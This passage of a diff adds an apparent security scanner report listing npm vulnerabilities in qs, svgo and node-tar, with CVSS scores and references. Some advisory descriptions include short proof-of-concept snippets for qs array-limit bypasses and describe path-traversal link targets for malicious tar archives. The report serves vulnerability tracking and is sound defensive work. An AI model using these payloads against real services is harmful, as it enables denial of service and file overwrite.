"ee24446d330a5e73" + }, + "InstalledVersion": "6.13.0", + "FixedVersion": "6.14.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-15284", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6943972ba0936e8a4587243f7bf2ae5ed1b6597f47a81e715d8530262f5987f1", + "Title": "qs: qs: Denial of Service via improper input validation in array parsing", + "Description": "Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS.This issue affects qs: \u003c 6.14.1.\n\n\nSummary\n\nThe arrayLimit option in qs did not enforce limits for bracket notation (a[]=1\u0026a[]=2), only for indexed notation (a[0]=1). This is a consistency bug; arrayLimit should apply uniformly across all array notations.\n\nNote: The default parameterLimit of 1000 effectively mitigates the DoS scenario originally described. With default options, bracket notation cannot produce arrays larger than parameterLimit regardless of arrayLimit, because each a[]=valueconsumes one parameter slot. The severity has been reduced accordingly.\n\nDetails\n\nThe arrayLimit option only checked limits for indexed notation (a[0]=1\u0026a[1]=2) but did not enforce it for bracket notation (a[]=1\u0026a[]=2).\n\nVulnerable code (lib/parse.js:159-162):\n\nif (root === '[]' \u0026\u0026 options.parseArrays) {\n obj = utils.combine([], leaf); // No arrayLimit check\n}\n\n\n\n\n\nWorking code (lib/parse.js:175):\n\nelse if (index \u003c= options.arrayLimit) { // Limit checked here\n obj = [];\n obj[index] = leaf;\n}\n\n\n\n\n\nThe bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index \u003c= options.arrayLimit before creating arrays.\n\n\n\nPoC\n\nconst qs = require('qs');\nconst result = qs.parse('a[]=1\u0026a[]=2\u0026a[]=3\u0026a[]=4\u0026a[]=5\u0026a[]=6', { arrayLimit: 5 });\nconsole.log(result.a.length); // Output: 6 (should be max 5)\n\n\n\n\n\nNote on parameterLimit interaction: The original advisory's \"DoS demonstration\" claimed a length of 10,000, but parameterLimit (default: 1000) caps parsing to 1,000 parameters. With default options, the actual output is 1,000, not 10,000.\n\nImpact\n\nConsistency bug in arrayLimit enforcement. With default parameterLimit, the practical DoS risk is negligible since parameterLimit already caps the total number of parsed parameters (and thus array elements from bracket notation). The risk increases only when parameterLimit is explicitly set to a very high value.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-20" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L", + "V3Score": 3.7, + "V40Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-15284", + "https://github.com/ljharb/qs", + "https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9", + "https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p", + "https://nvd.nist.gov/vuln/detail/CVE-2025-15284", + "https://www.cve.org/CVERecord?id=CVE-2025-15284" + ], + "PublishedDate": "2025-12-29T23:15:42.703Z", + "LastModifiedDate": "2026-02-26T19:57:11.663Z" + }, + { + "VulnerabilityID": "CVE-2026-2391", + "VendorIDs": [ + "GHSA-w7fw-mjwx-w883" + ], + "PkgID": "qs@6.13.0", + "PkgName": "qs", + "PkgIdentifier": { + "PURL": "pkg:npm/qs@6.13.0", + "UID": "ee24446d330a5e73" + }, + "InstalledVersion": "6.13.0", + "FixedVersion": "6.14.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2391", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0575f71b068f35edc0acc2045b3f1aee53371ab217dcf2a2e315bfc9cea3fe6a", + "Title": "qs: qs's arrayLimit bypass in comma parsing allows denial of service", + "Description": "### Summary\nThe `arrayLimit` option in qs does not enforce limits for comma-separated values when `comma: true` is enabled, allowing attackers to cause denial-of-service via memory exhaustion. This is a bypass of the array limit enforcement, similar to the bracket notation bypass addressed in GHSA-6rw7-vpxm-498p (CVE-2025-15284).\n\n### Details\nWhen the `comma` option is set to `true` (not the default, but configurable in applications), qs allows parsing comma-separated strings as arrays (e.g., `?param=a,b,c` becomes `['a', 'b', 'c']`). However, the limit check for `arrayLimit` (default: 20) and the optional throwOnLimitExceeded occur after the comma-handling logic in `parseArrayValue`, enabling a bypass. This permits creation of arbitrarily large arrays from a single parameter, leading to excessive memory allocation.\n\n**Vulnerable code** (lib/parse.js: lines ~40-50):\n```js\nif (val \u0026\u0026 typeof val === 'string' \u0026\u0026 options.comma \u0026\u0026 val.indexOf(',') \u003e -1) {\n    return val.split(',');\n}\n\nif (options.throwOnLimitExceeded \u0026\u0026 currentArrayLength \u003e= options.arrayLimit) {\n    throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');\n}\n\nreturn val;\n```\nThe `split(',')` returns the array immediately, skipping the subsequent limit check. Downstream merging via `utils.combine` does not prevent allocation, even if it marks overflows for sparse arrays.This discrepancy allows attackers to send a single parameter with millions of commas (e.g., `?param=,,,,,,,,...`), allocating massive arrays in memory without triggering limits. It bypasses the intent of `arrayLimit`, which is enforced correctly for indexed (`a[0]=`) and bracket (`a[]=`) notations (the latter fixed in v6.14.1 per GHSA-6rw7-vpxm-498p).\n\n### PoC\n**Test 1 - Basic bypass:**\n```\nnpm install qs\n```\n\n```js\nconst qs = require('qs');\n\nconst payload = 'a=' + ','.repeat(25); // 26 elements after split (bypasses arrayLimit: 5)\nconst options = { comma: true, arrayLimit: 5, throwOnLimitExceeded: true };\n\ntry {\n  const result = qs.parse(payload, options);\n  console.log(result.a.length); // Outputs: 26 (bypass successful)\n} catch (e) {\n  console.log('Limit enforced:', e.message); // Not thrown\n}\n```\n**Configuration:**\n- `comma: true`\n- `arrayLimit: 5`\n- `throwOnLimitExceeded: true`\n\nExpected: Throws \"Array limit exceeded\" error.\nActual: Parses successfully, creating an array of length 26.\n\n\n### Impact\nDenial of Service (DoS) via memory exhaustion.", + "Severity": "LOW", + "CweIDs": [ + "CWE-20" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 3.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2391", + "https://github.com/ljharb/qs", + "https://github.com/ljharb/qs/commit/f6a7abff1f13d644db9b05fe4f2c98ada6bf8482", + "https://github.com/ljharb/qs/security/advisories/GHSA-w7fw-mjwx-w883", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2391", + "https://www.cve.org/CVERecord?id=CVE-2026-2391" + ], + "PublishedDate": "2026-02-12T05:17:11.187Z", + "LastModifiedDate": "2026-02-24T20:13:51.837Z" + }, + { + "VulnerabilityID": "CVE-2026-29074", + "VendorIDs": [ + "GHSA-xpqw-6gx7-v673" + ], + "PkgID": "svgo@3.3.2", + "PkgName": "svgo", + "PkgIdentifier": { + "PURL": "pkg:npm/svgo@3.3.2", + "UID": "799b27abaf83d459" + }, + "InstalledVersion": "3.3.2", + "FixedVersion": "2.8.1, 3.3.3, 4.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29074", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0c40bfa10908984313e661a8adb2b4ffb75795a776dd82c617123d85dd0fa194", + "Title": "svgo: SVGO: Denial of Service via XML entity expansion", + "Description": "SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-776" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29074", + "https://github.com/svg/svgo", + "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29074", + "https://www.cve.org/CVERecord?id=CVE-2026-29074" + ], + "PublishedDate": "2026-03-06T08:16:26.92Z", + "LastModifiedDate": "2026-03-10T19:02:54.257Z" + }, + { + "VulnerabilityID": "CVE-2026-23745", + "VendorIDs": [ + "GHSA-8qq5-rm4j-mr97" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:08d8b4a5db502ee5fd9a40233dbf966ecb6e1061cb22c90d87e097838a08c39c", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", + "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23745", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", + "https://www.cve.org/CVERecord?id=CVE-2026-23745" + ], + "PublishedDate": "2026-01-16T22:16:26.83Z", + "LastModifiedDate": "2026-02-18T16:20:07.823Z" + }, + { + "VulnerabilityID": "CVE-2026-23950", + "VendorIDs": [ + "GHSA-r6q2-hw4h-h46w" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1a6dca275f9b61fbf64970298743723ac9f8c83b76fc89dbeea6e93b56f41e0b", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", + "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-176", + "CWE-352", + "CWE-367" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23950", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", + "https://www.cve.org/CVERecord?id=CVE-2026-23950" + ], + "PublishedDate": "2026-01-20T01:15:57.87Z", + "LastModifiedDate": "2026-02-18T15:50:29.91Z" + }, + { + "VulnerabilityID": "CVE-2026-24842", + "VendorIDs": [ + "GHSA-34x7-hfp2-rc4v" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:661fb4dbeb0451bf3364a9fdf1d85d7b5b25fd295fdb6a0dc0e82386dd0178b5", + "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", + "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-24842", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", + "https://www.cve.org/CVERecord?id=CVE-2026-24842" + ], + "PublishedDate": "2026-01-28T01:16:14.947Z", + "LastModifiedDate": "2026-02-02T14:30:10.89Z" + }, + { + "VulnerabilityID": "CVE-2026-26960", + "VendorIDs": [ + "GHSA-83g3-92jg-28cx" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.8", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e12f4efde71cbbbd1999469aab05a7c998047f064c44d0ad68b6c566c87fc220", + "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", + "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26960", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", + "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", + "https://www.cve.org/CVERecord?id=CVE-2026-26960" + ], + "PublishedDate": "2026-02-20T02:16:53.883Z", + "LastModifiedDate": "2026-02-20T19:24:16.537Z" + }, + { + "VulnerabilityID": "CVE-2026-29786", + "VendorIDs": [ + "GHSA-qffp-2rhf-9h96" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0511ed58ab29fce26548c8335f4ee276509daa7e1f25d23e1f94f92769b92242", + "Title": "node-tar: hardlink path traversal via drive-relative linkpath", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29786", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", + "https://www.cve.org/CVERecord?id=CVE-2026-29786" + ], + "PublishedDate": "2026-03-07T16:15:55.587Z", + "LastModifiedDate": "2026-03-11T21:50:01.91Z" + }, + { + "VulnerabilityID": "CVE-2026-31802", + "VendorIDs": [ + "GHSA-9ppj-qmqm-q256" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.11", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:149a86bd0d45e0af151de9dee2bfd37d877ed471b37c8ddd23c295f15fb334bf", + "Title": "tar: tar: File overwrite via drive-relative symlink traversal", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31802", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", + "https://www.cve.org/CVERecord?id=CVE-2026-31802" + ], + "PublishedDate": "2026-03-10T07:44:58.02Z", + "LastModifiedDate": "2026-03-18T18:13:34.703Z" + }, + { + "VulnerabilityID": "CVE-2026-23745", + "VendorIDs": [ + "GHSA-8qq5-rm4j-mr97" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:91f1242953a088524936ce5cd1ed76e7c0c454441795633d40dd5a50e92b4a6f", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", + "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23745", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", + "https://www.cve.org/CVERecord?id=CVE-2026-23745" + ], + "PublishedDate": "2026-01-16T22:16:26.83Z", + "LastModifiedDate": "2026-02-18T16:20:07.823Z" + }, + { + "VulnerabilityID": "CVE-2026-23950", + "VendorIDs": [ + "GHSA-r6q2-hw4h-h46w" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:486fcef24360966a2db3dac7580aa7a6898d16cb62fb2db88b1ce7faef683213", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", + "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-176", + "CWE-352", + "CWE-367" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23950", + 